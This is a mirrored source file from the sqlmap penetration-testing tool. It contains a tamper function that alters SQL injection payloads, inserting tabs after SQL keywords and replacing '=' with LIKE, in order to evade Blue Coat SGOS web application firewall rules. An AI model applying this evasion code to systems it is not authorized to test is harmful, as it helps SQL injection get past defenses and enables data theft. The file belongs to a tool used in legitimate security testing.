mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 17:46:37 +03:00
44 lines
1.0 KiB
Python
44 lines
1.0 KiB
Python
#!/usr/bin/env python
|
|
|
|
"""
|
|
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
|
See the file 'doc/COPYING' for copying permission
|
|
"""
|
|
|
|
import re
|
|
|
|
from lib.core.enums import PRIORITY
|
|
|
|
__priority__ = PRIORITY.NORMAL
|
|
|
|
def dependencies():
|
|
pass
|
|
|
|
def tamper(payload, **kwargs):
|
|
"""
|
|
Replaces space character after SQL statement with a valid random blank character.
|
|
Afterwards replace character = with LIKE operator
|
|
|
|
Example:
|
|
* Input: SELECT id FROM users where id = 1
|
|
* Output: SELECT%09id FROM users where id LIKE 1
|
|
|
|
Requirement:
|
|
* Blue Coat SGOS with WAF activated as documented in
|
|
https://kb.bluecoat.com/index?page=content&id=FAQ2147
|
|
|
|
Tested against:
|
|
* MySQL 5.1, SGOS
|
|
|
|
Notes:
|
|
* Useful to bypass Blue Coat's recommended WAF rule configuration
|
|
"""
|
|
|
|
retVal = payload
|
|
|
|
if payload:
|
|
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
|
|
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
|
|
|
|
return retVal
|